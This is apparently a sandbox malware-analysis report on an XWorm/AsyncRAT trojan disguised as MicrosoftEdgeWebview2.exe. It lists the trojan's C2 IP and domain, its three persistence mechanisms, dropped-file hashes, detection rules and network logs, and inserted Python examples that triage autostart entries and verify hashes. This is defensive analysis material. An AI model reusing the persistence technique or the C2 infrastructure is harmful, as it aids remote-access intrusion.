http://www.microsoft. | powershell.exe, 00000001.00000002.1756847376.0000019BA089E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://crl.micft.cMicRosof | powershell.exe, 00000007.00000002.1991423534.000001C3E164F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1728941013.0000019B88271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593CFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C8EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | MicrosoftEdgeWebview2.exe, 00000000.00000002.2925865924.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1728941013.0000019B88271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593CFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C8EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 1%; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
147.185.221.20 | on-weighted.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1501598
Start date and time: 2024-08-30 07:17:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: MicrosoftEdgeWebview2.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@21/21@1/1
EGA Information:
• Successful, ratio: 11.1%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 74
• Number of non-executed functions: 9
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target MicrosoftEdgeWebview2.exe, PID 2004 because it is empty
• Execution Graph export aborted for target MicrosoftEdgeWebview2.exe, PID 5324 because it is empty
• Execution Graph export aborted for target MicrosoftEdgeWebview2.exe, PID 5408 because it is empty
• Execution Graph export aborted for target MicrosoftEdgeWebview2.exe, PID 5800 because it is empty
• Execution Graph export aborted for target MicrosoftEdgeWebview2.exe, PID 8068 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7324 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7716 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7964 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
Time | Type | Description
01:17:59 | API Interceptor | 51x Sleep call for process: powershell.exe modified
01:18:55 | API Interceptor | 516117x Sleep call for process: MicrosoftEdgeWebview2.exe modified
06:18:51 | Task Scheduler | Run new task: MicrosoftEdgeWebview2 path: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
06:18:51 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeWebview2 C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
06:18:59 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeWebview2 C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
06:19:07 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeWebview2.lnk
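The timeline above records the same executable being persisted three ways (a scheduled task, an HKCU Run value and a Startup-folder shortcut), all pointing at a copy of the sample in %LOCALAPPDATA%\Temp. The Python below is an added triage example, not part of the Joe Sandbox report or of the sample's own code: it extracts the target executable from each autostart entry, flags targets that live in user-writable scratch directories, and groups the hits by target so that multi-mechanism persistence like this one stands out. SAMPLE_ENTRIES is constructed from the timeline (the .lnk entry is given the resolved target that the shortcut's content later in the report shows), the OneDrive entry is a made-up benign control, and the SUSPICIOUS_DIRS list, the triage and target_path helpers and the collect_run_keys registry reader are this example's own choices; the registry reader only does anything on a Windows host.

```python
"""Autostart triage for the persistence recorded in the timeline above.

Added example (not Joe Sandbox output): the evaluation logic is pure Python
and runs anywhere; the registry collector only works on a live Windows host.
"""
import ntpath
import re
import sys
from collections import defaultdict
from dataclasses import dataclass

# Directories from which no legitimately installed program should persist.
# This list is an assumption of the example, not a sandbox rule.
SUSPICIOUS_DIRS = (
    "\\appdata\\local\\temp\\",
    "\\windows\\temp\\",
    "\\users\\public\\",
    "\\downloads\\",
)


@dataclass(frozen=True)
class AutostartEntry:
    mechanism: str  # "run_key", "scheduled_task" or "startup_folder"
    name: str       # value name, task name or .lnk file name
    command: str    # command line, task action, or the .lnk's resolved target


def target_path(command: str) -> str:
    """Extract the executable path from a command line, quoted or not."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    # Unquoted: take everything up to the first ".exe" followed by a separator.
    match = re.match(r"(.+?\.exe)(?:\s|$)", command, re.IGNORECASE)
    return match.group(1) if match else command.split(" ", 1)[0]


def is_suspicious_location(path: str) -> bool:
    """True when the executable lives in a user-writable scratch directory."""
    norm = ntpath.normpath(path).lower()
    return any(directory in norm for directory in SUSPICIOUS_DIRS)


def triage(entries):
    """Group flagged entries by target so multi-mechanism persistence stands out.

    Returns {normalized_target_path: [mechanism, ...]} for suspicious targets only.
    """
    by_target = defaultdict(list)
    for entry in entries:
        path = target_path(entry.command)
        if is_suspicious_location(path):
            by_target[ntpath.normpath(path).lower()].append(entry.mechanism)
    return dict(by_target)


def collect_run_keys():
    """Read HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run on Windows.

    Returns [] on other platforms. Scheduled-task actions and Startup-folder
    .lnk targets need `schtasks /Query /XML` output and a LNK parser
    respectively; collecting those is left to the caller.
    """
    if sys.platform != "win32":
        return []
    import winreg  # Windows-only module, imported lazily on purpose
    entries = []
    key_path = r"Software\Microsoft\Windows\CurrentVersion\Run"
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path) as key:
        index = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, index)
            except OSError:  # no more values under the key
                break
            entries.append(AutostartEntry("run_key", name, str(value)))
            index += 1
    return entries


# Constructed input: the three entries from the report timeline (the .lnk is
# given its resolved target, as shown in the shortcut's content later in the
# report) plus one ordinary Run value that must not be flagged.
TEMP_EXE = r"C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
SAMPLE_ENTRIES = [
    AutostartEntry("scheduled_task", "MicrosoftEdgeWebview2", TEMP_EXE),
    AutostartEntry("run_key", "MicrosoftEdgeWebview2", TEMP_EXE),
    AutostartEntry("startup_folder", "MicrosoftEdgeWebview2.lnk", TEMP_EXE),
    AutostartEntry("run_key", "OneDrive",
                   r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

if __name__ == "__main__":
    for target, mechanisms in triage(SAMPLE_ENTRIES + collect_run_keys()).items():
        print(f"{target}: persisted via {', '.join(mechanisms)}")
```

On the constructed input the only flagged target is the Temp copy, reported with all three mechanisms; a single hit from one mechanism is common noise, the same file reached from three is the pattern worth escalating.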
Match | Associated Sample Name / URL | Detection | Threat Name | Context
147.185.221.20 | Ekpb7jn7mf.exe | malicious | RedLine, XWorm | pst-child.gl.at.ply.gg:9336/
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SALSGIVERUS | abomr3e.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | SenditIllrunitinmyvirtualmachineinsidemyvirtualmachine.bat | malicious | Unknown | 147.185.221.21
SALSGIVERUS | ChenzeCheats.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | XClient.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | Image Logger Installer.exe | malicious | AsyncRAT, XWorm | 147.185.221.21
SALSGIVERUS | Ozj6OxEatlic.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | Neverlose.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | Solara.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | XClient.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | dsjjzgRwZe.exe | malicious | Njrat | 147.185.221.22
            No context
            No context
Process: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
File Type: CSV text
Category: dropped
Size (bytes): 654
Entropy (8bit): 5.380476433908377
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5: 30E4BDFC34907D0E4D11152CAEBE27FA
SHA1: 825402D6B151041BA01C5117387228EC9B7168BF
SHA-256: A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512: 89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe
File Type: Generic INItialization configuration [WIN]
Category: dropped
Size (bytes): 64
Entropy (8bit): 3.6722687970803873
Encrypted: false
SSDEEP: 3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
MD5: DE63D53293EBACE29F3F54832D739D40
SHA1: 1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
SHA-256: A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
SHA-512: 10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
Malicious: false
Preview: ....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

Process: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 64000
Entropy (8bit): 6.755835099911209
Encrypted: false
SSDEEP: 1536:9STRUN9+EwCuuJfBFv9/O6OOwUOJSnjEF3b:9cM7Fv9/uOwDSQ3b
MD5: 51A89F27AFE7C3B57D5CDAD473178934
SHA1: F945EBA7F25F15D231F962143B8F0381270709FB
SHA-256: E36AA73B955F2E30B2377DD33C6B55C798F7334ACE728B0AD19187965CBE8196
SHA-512: 2DDE54DD4F3A691F30B8B5FC45D91268D8FC0931852737FB3AB3605ABC97E44CF6421870809D4C72316AC917E61B2858BFC4340EF505AA9395E3C20CF80CB563
Malicious: true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 82%
• Antivirus: Virustotal, Detection: 69%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.....................b......N.... ........@.. .......................@............@.....................................S........_................... ....................................................... ............... ..H............text...T.... ...................... ..`.rsrc...._.......`..................@..@.reloc....... ......................@..B................0.......H........[..4X............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
(The report lists this same 60-byte PowerShell AppLocker probe file, with identical size, hashes and entropy, 15 more times; the repeated entries are omitted here.)
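Every dropped-file entry above carries the same identity fields: size, MD5/SHA1/SHA-256/SHA-512, an 8-bit entropy figure and an Encrypted flag. The Python below is an added example, not Joe Sandbox code, that reproduces those fields so the figures in the report can be checked and so the same check can be run on files recovered from a live host. Its constructed input is the 60-byte PowerShell AppLocker probe file listed above; the preview shows 59 printable characters, so a trailing space is assumed as the 60th byte (a space is the only single-byte completion whose entropy equals the reported 4.038920595031593, and a trailing position is where PowerShell writes it). The 7.2 threshold in looks_packed_or_encrypted is this example's assumption, not the sandbox's rule for its Encrypted column.

```python
"""Reproduce the per-file identity fields of a sandbox dropped-file entry.

Added example, not Joe Sandbox code. The input is the AppLocker probe file
PowerShell writes; its 60th byte is assumed to be a trailing space (the
visible preview has 59 characters and the report says 60 bytes).
"""
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant file, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def file_identity(data: bytes) -> dict:
    """The size/hash/entropy tuple a sandbox report prints for each dropped file."""
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
        "entropy": shannon_entropy(data),
    }


def looks_packed_or_encrypted(entropy: float, threshold: float = 7.2) -> bool:
    """Heuristic behind an 'Encrypted' style flag: entropy close to 8 means
    compressed or encrypted content. The threshold is this example's choice."""
    return entropy >= threshold


# Constructed input (see the module docstring for the trailing-space assumption).
APPLOCKER_PROBE = b"# PowerShell test file to determine AppLocker lockdown mode "

# Values copied from the report entry for that file.
REPORTED = {
    "size": 60,
    "md5": "D17FE0A3F47BE24A6453E9EF58C94641",
    "sha256": "96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7",
    "entropy": 4.038920595031593,
}


def compare_to_report(data: bytes = APPLOCKER_PROBE, reported: dict = REPORTED) -> dict:
    """Field-by-field agreement with the report; entropy is compared to 1e-9."""
    actual = file_identity(data)
    return {
        "size": actual["size"] == reported["size"],
        "md5": actual["md5"] == reported["md5"],
        "sha256": actual["sha256"] == reported["sha256"],
        "entropy": math.isclose(actual["entropy"], reported["entropy"], abs_tol=1e-9),
    }


if __name__ == "__main__":
    identity = file_identity(APPLOCKER_PROBE)
    for field, value in identity.items():
        print(f"{field}: {value}")
    print("agrees with report:", compare_to_report())
    print("packed/encrypted heuristic on the sample's 6.7558 entropy:",
          looks_packed_or_encrypted(6.755835099911209))
```

The entropy figure is the one field that can be confirmed from the page alone; the hash comparison additionally depends on the trailing-space assumption being right about byte position, which is why the block reports it as a separate boolean rather than folding it into the entropy check. Applied to the 64,000-byte self-copy in Temp, the identical MD5/SHA1/SHA-256 values in that entry and in the static file information show it is a byte-for-byte copy of the submitted sample rather than a second-stage payload.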
Process: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 30 04:18:50 2024, mtime=Fri Aug 30 04:18:50 2024, atime=Fri Aug 30 04:18:50 2024, length=64000, window=hide
Category: dropped
Size (bytes): 1124
Entropy (8bit): 5.0312295532362805
Encrypted: false
SSDEEP: 24:82bCK3CEldGTl2RTgK7vzFA8fdZ6bbOzw73vqyFm:82bCK3CMS2RPzuIdZ6bbOzwWyF
MD5: A2656B1015970A602164455E406EEF62
SHA1: CE47BBF3B0C051B589D39F6D75DA5F22EC9EFD31
SHA-256: 773BA63D5A6212640F3F31A447881C7B1A6C83A4AA7530E133E1FF2F0904E812
SHA-512: 1646526B6A4E87F9F2B89C364D718C35EF93116F71F04B115FCA2D407D0BE2A4BBA5505AB792AEA2D69ED90EBE195AE365C5308E51FA18EB0DA9EB4A33BB3B40
Malicious: false
Preview: L..................F.... ...-.......-.......-.................................:..DG..Yr?.D..U..k0.&...&......vk.v...... .....CZ..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y;*...........................%..A.p.p.D.a.t.a...B.P.1......Y9*..Local.<......CW.^.Y;*....b.........................L.o.c.a.l.....N.1......YP*..Temp..:......CW.^.YP*....l.....................O...T.e.m.p.......2......YZ* .MICROS~1.EXE..d.......YZ*.YZ*...........................B$.M.i.c.r.o.s.o.f.t.E.d.g.e.W.e.b.v.i.e.w.2...e.x.e.......j...............-.......i.............m.....C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe..6.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.M.i.c.r.o.s.o.f.t.E.d.g.e.W.e.b.v.i.e.w.2...e.x.e.............:...........|....I.J.H..K..:...`.......X.......888683...........hT..CrF.f4... .D.T..b...,.......hT..CrF.f4... .D.T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 6.755835099911209
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: MicrosoftEdgeWebview2.exe
File size: 64'000 bytes
MD5: 51a89f27afe7c3b57d5cdad473178934
SHA1: f945eba7f25f15d231f962143b8f0381270709fb
SHA256: e36aa73b955f2e30b2377dd33c6b55c798f7334ace728b0ad19187965cbe8196
SHA512: 2dde54dd4f3a691f30b8b5fc45d91268d8fc0931852737fb3ab3605abc97e44cf6421870809d4c72316ac917e61b2858bfc4340ef505aa9395e3c20cf80cb563
SSDEEP: 1536:9STRUN9+EwCuuJfBFv9/O6OOwUOJSnjEF3b:9cM7Fv9/uOwDSQ3b
TLSH: B853AD8437948226E9EE7BF95273A54B1B30B6035813C78D4CE8C6CB1B67BD48E427D6
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.....................b......N.... ........@.. .......................@............@................................
Icon Hash: df6279fe3f0d0606
Entrypoint: 0x40b44e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x66CB0417 [Sun Aug 25 10:14:47 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
            Instruction
            jmp dword ptr [00402000h]
            add byte ptr [eax], al
            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb3f8 | 0x53 | .text
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x5fb0 | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12000 | 0xc | .reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x2000 | 0x9454 | 0x9600 | a38e2b7e96c2d02af8971d8a76da4076 | False | 0.4872135416666667 | data | 5.677666315349684 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rsrc | 0xc000 | 0x5fb0 | 0x6000 | 4f371098be6b4da3c47fb336edd45070 | False | 0.9289143880208334 | data | 7.791206677674762 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc | 0x12000 | 0xc | 0x200 | e1d653c1eeaa7cbebda58b1e22380eac | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
            RT_ICON | 0xc130 | 0x5a04 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9580367991668113
            RT_GROUP_ICON | 0x11b34 | 0x14 | data | | | 0.9
            RT_VERSION | 0x11b48 | 0x27c | data | | | 0.4606918238993711
            RT_MANIFEST | 0x11dc4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
            DLL | Import
            mscoree.dll | _CorExeMain
            Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
            2024-08-30T07:19:29.560654+0200 | TCP | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 49738 | 15883 | 192.168.2.4 | 147.185.221.20
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Aug 30, 2024 07:18:55.516511917 CEST | 49737 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:18:55.521333933 CEST | 15883 | 49737 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:18:55.521459103 CEST | 49737 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:18:55.730798960 CEST | 49737 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:18:55.735830069 CEST | 15883 | 49737 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:19:09.375549078 CEST | 49737 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:09.380788088 CEST | 15883 | 49737 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:19:16.896280050 CEST | 15883 | 49737 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:19:16.896406889 CEST | 49737 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:19.107557058 CEST | 49737 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:19.112257957 CEST | 49738 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:19.112472057 CEST | 15883 | 49737 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:19:19.117044926 CEST | 15883 | 49738 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:19:19.117110014 CEST | 49738 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:19.157509089 CEST | 49738 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:19.162471056 CEST | 15883 | 49738 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:19:29.560653925 CEST | 49738 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:29.565642118 CEST | 15883 | 49738 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:19:39.966727018 CEST | 49738 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:39.971720934 CEST | 15883 | 49738 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:19:40.493653059 CEST | 15883 | 49738 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:19:40.493737936 CEST | 49738 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:40.669699907 CEST | 49738 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:40.670891047 CEST | 49739 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:40.674616098 CEST | 15883 | 49738 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:19:40.675692081 CEST | 15883 | 49739 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:19:40.675767899 CEST | 49739 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:40.788808107 CEST | 49739 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:40.794116020 CEST | 15883 | 49739 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:19:54.842037916 CEST | 49739 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:54.846987963 CEST | 15883 | 49739 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:19:57.404102087 CEST | 49739 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:57.408987999 CEST | 15883 | 49739 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:19:59.153973103 CEST | 49739 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:59.159423113 CEST | 15883 | 49739 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:19:59.279125929 CEST | 49739 | 15883 | 192.168.2.4 | 147.185.221.20
            Aug 30, 2024 07:19:59.283907890 CEST | 15883 | 49739 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:20:00.138463020 CEST | 49739 | 15883 | 192.168.2.4 | 147.185.221.20
